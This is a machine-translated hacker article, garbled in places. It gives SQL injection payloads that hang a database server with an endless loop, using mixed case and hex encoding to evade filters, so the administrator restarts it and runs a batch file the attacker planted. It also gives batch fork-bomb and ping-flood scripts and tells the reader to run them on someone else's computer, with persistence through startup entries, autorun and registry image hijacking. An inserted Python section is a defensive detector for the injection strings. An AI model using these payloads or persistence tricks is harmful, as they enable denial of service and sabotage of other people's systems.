Inject code to stop the server from responding

Source: Internet
Author: User

Author: 250048111@qq.com (yezi)
Sometimes, after using a database backup to write a batch file into the Startup menu, we want the server to run our batch file at the next restart. But what should we do if we wait and the server does not restart? Ask the Administrator to restart the system. Haha
The following injection code causes the server to stop responding, or to respond slowly. To achieve better results, submit it at the injection point several times. In the end, the administrator restarts the server.
Numeric injection point:
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
Text injection point:
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
Or run the following command in Declare + EXEC mode:
; DEcLaRe @ s vArChAr (8000) sEt @ s = 0x7748694c6520313c392

0624567496e2073456c456354206348615228302920654e64 eXeC (@ s )--
The code above creates an endless loop on the database server, exhausting the server's resources and thus causing a denial of service (DoS). The Administrator will restart the server for you.
Note: The above code is aggressive. Please use it with caution.
Note: The select char (0) can be changed to select power (1.23456, 100) to increase the calculation workload.
----------------- Cigarette holder --------------------
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
This statement means: while 1 is less than 9, return the character with ASCII code 0. It is an endless loop because the condition is always true, and it runs until the machine's resources are exhausted.
The letter case is mixed to bypass website filtering and anti-injection checks.
; Declare @ s varchar (8000) set @ s = 0x7748694c6520313c3920624567496e2

073456c456354206348615228302920654e64 exec (@ s )--
Declare @s varchar(8000) defines @s as a varchar of length 8000. The statement WHiLe 1 <9 bEgIn select cHaR (0) eNd is encoded as HEX and assigned to @s, which is then executed with exec.
Its purpose is to bypass website filtering and anti-injection checks.
; WHiLe 1 <9 bEgIn select cHaR (0) eNd --
Because it is injection of injection type. I cannot explain it clearly.
Select power (1.23456, 100) returns the 1.23456 power root of 100. It's strange that it's not dead.
The concat function Concatenates the Character Differences in the content. benchmark (9999999999999, md5 (test) reports the running time of the client. Blind injection may be useful.
I don't know what the concat function does for attacks? W hex Encoding 0x77 benchmark (9999999999999, md5 (0x77) This may bypass anti-Injection
Cool!
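Added example (not part of the original article): a detector for request parameter values that lowercases, collapses whitespace and decodes 0x literals before matching, so the case mixing and HEX encoding described above do not hide the loop from it. The rule names, regular expressions and sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules for the constructs this page describes: a WHILE ... BEGIN loop, a
# DECLARE ... EXEC(@var) wrapper, and MySQL's benchmark() call.
RULES = {
    "while_loop": re.compile(r"\bwhile\b[^;]*?[<>=][^;]*?\bbegin\b"),
    "dynamic_exec": re.compile(r"\bdeclare\s*@\s*\w+.*\bexec\s*\(\s*@"),
    "benchmark": re.compile(r"\bbenchmark\s*\("),
}
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){4,})")


def normalize(value):
    """URL-decode, lowercase and collapse whitespace, which undoes case mixing."""
    return re.sub(r"\s+", " ", unquote_plus(value)).lower()


def decode_hex_literals(text):
    """Append the decoded text of each 0x literal so the rules see it too."""
    decoded = [bytes.fromhex(m.group(1)).decode("latin-1").lower()
               for m in HEX_LITERAL.finditer(text)]
    return " ".join([text] + decoded)


def classify(param_value):
    """Return the set of rule names that a request parameter value triggers."""
    text = decode_hex_literals(normalize(param_value))
    return {name for name, rule in RULES.items() if rule.search(text)}


# Constructed sample parameter values (not taken from real logs).
LOOP = "WHiLe 1<9 bEgIn select cHaR(0) eNd"
SAMPLES = {
    "plain_id": "42",
    "prose": "a while ago we begin",
    "mixed_case": "1; " + LOOP + " --",
    "url_encoded": "1%3B%20WHiLe%201%3C9%20bEgIn%20select%20cHaR(0)%20eNd%20--",
    "hex_wrapped": "1; DEcLaRe @s vArChAr(8000) sEt @s=0x"
                   + LOOP.encode().hex() + " eXeC(@s)--",
    "timing": "1 and benchmark(9999999999999, md5(0x77))",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(label, sorted(classify(value)))
```

Matching like this is for log review or a filtering layer; parameterized queries remain the fix for the injection point itself.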
----------------------------------------------------------------------------------------------------
Ping enhanced version of endless loop
Source: colored radish's blog
Testing on a virtual machine is recommended.
Or run the change batch processing on someone else's computer.
She can make her computer fail to respond immediately
Instead, you have to restart the machine.
If you are still poisoned, you can put her in the startup Item.
Add an Autorun file if it is still poisoned. open = this batch path
Then, the image is hijacked in the registry, allowing her to click commonly used tools such as QQ, MSN, and IE.
Activate Batch Processing
Let her go
Dual-core tests have also been performed and can only be restarted, reflecting a simpler response than before.
Loop loops must be N times stronger
Haha
It's too late to knock shutdown-
Close group and other operations
Pure entertainment
No harm to system files
No problem after restart
The attachment contains the source files during my test. If you are lazy, you can download them.
Attached source file content
Note: extract the two files to the same directory.
Start. bat

@ Echo off
Color 2f
Echo.
Title endless loop-ping enhanced version-zzw Creation
Echo ####################################### #############################
Echo # ping enhanced version-zzw creation for endless loops #
Echo ####################################### #############################
Echo.
: Loop
Start zzw. bat
Goto: loop
Echo started successfully

Zzw. bat

@ Echo off
Ping fig-l 65500-t

Attached to previous dead loop Batch Processing

@ Echo off
: Loop
Start cmd.exe
Goto: loop

Of course, some people may ask if they don't want to replace cmd.exe with other applications, but if you want to know that her computer has those big applications
 
